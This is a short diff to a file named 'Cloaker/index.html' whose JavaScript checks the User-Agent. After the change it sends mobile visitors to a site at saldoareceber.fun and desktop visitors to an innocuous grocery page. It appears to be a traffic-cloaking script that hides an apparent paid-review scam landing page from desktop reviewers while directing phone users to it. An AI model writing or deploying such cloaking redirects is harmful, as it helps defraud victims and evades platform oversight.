--- a/Cloaker/index.html
+++ b/Cloaker/index.html
@@ -7,9 +7,9 @@
     <script type="text/javascript">
         // Verifica o tipo de dispositivo com base no User-Agent
         if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
-            window.location.href = "https://www.livup.com.br/ingredientes/maca"; // Dispositivo móvel
+            window.location.href = "https://saldoareceber.fun/avaliador1/pv/1-inicio/"; // Dispositivo móvel
         } else {
-            window.location.href = "https://saldoareceber.fun/avaliador1/pv/1-inicio/"; // Desktop
+            window.location.href = "https://www.livup.com.br/ingredientes/maca"; // Desktop
         }
     </script>
 </body>
